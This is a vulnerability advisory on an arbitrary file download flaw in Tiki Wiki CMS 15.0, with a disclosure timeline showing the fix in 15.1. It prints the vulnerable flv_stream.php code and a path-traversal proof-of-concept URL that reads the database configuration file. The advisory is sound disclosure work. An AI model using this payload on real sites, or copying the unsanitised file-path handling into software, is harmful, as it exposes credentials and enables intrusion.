11-07-2016 / Vulnerabilities

Tiki Wiki CMS 15.0 Arbitrary File Download

Using flv_stream.php file from vendor directory we can download any file.

File: tiki-15.0\vendor\player\flv\flv_stream.php

<?php
session_cache_limiter('nocache');
header('Expires: Thu, 19 Nov 1981 08:52:00 GMT');
header('Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0');
header('Pragma: no-cache');
$position = $_GET['position'];
$filename = dirname(__FILE__).'/'.htmlspecialchars($_GET['file']);
if (file_exists($filename)) {
	header('Content-Type: video/x-flv');
	if ($position != 0) {
		echo 'FLV', pack('CCNN', 1, 1, 9, 9);
	}
	$file = fopen($filename, "rb");
	fseek($file, $position);
	while (!feof($file)) {
		echo fread($file, 16384);
	}
	fclose($file);
} else {
	echo 'The file does not exist';
}
?>

Proof of Concept

Example for downloading database configuration:

http://tiki/vendor/player/flv/flv_stream.php?file=../../../db/local.php&position=0

Timeline

01-06-2016: Discovered
01-06-2016: Vendor notified
08-06-2016: Version 15.1 released, issue resolved

Vulnerabilities

Kallithea <= 0.3.4 Incorrect access control and XSS

This vulnerability allows a normal user to modify the permissions of repositories that he normally shouldn’t have access to.

12-12-2018

2 MIN READ

Vulnerabilities

Gitea 1.4.0 Unauthenticated Remote Code Execution

This is part 1 of 3 about bugs inside Gitea

05-07-2018

5 MIN READ

Vulnerabilities

ManageEngine Exchange Reporter Plus Unauthenticated Remote Code Execution

How to create a Metasploit module in example?

28-06-2018

1 MIN READ